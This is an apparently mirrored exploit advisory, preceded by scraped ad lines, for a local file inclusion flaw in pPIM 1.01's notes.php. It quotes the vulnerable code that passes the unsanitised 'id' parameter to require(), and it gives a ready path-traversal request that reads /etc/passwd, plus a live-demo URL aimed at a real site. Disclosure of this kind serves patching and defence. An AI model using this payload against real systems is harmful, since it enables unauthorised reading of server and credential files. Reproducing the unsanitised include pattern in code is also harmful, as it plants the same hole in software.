pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability

Play online games at GameDuell.
New Training Titles for Audio Software, Hardware & Technical Skills.
Shockwave has the game Risk! Buy it now!
Join LinkShare Today!
SYNC Outlook and Files on all your Computers

# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
# url: http://www.phlatline.org/docs/files/ppim.zip
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
description of vulnerability:
———————————————–
the variable ‘id’ has been not defined in code
and the variable ‘id’ is sent by the users.
———————————————–
vuln file: notes.php
vuln code:
x: >…
107: if (isset($_GET["mode"]))
{
if ($_GET["mode"]==”edit”)
{
if (isset($_GET['id']))
{
$notefile = $_GET['id'];
if ($notefile == “new”)
{
$title = “”;
$notes = “”;
}
else
{
$temp = “notes/” . $notefile;
require($temp);
123: }
x: <…
x: }}}
exploit: GET /notes.php?mode=edit&id=[file]
sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd
live demo:
http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php

(Captured from milw0rm.com)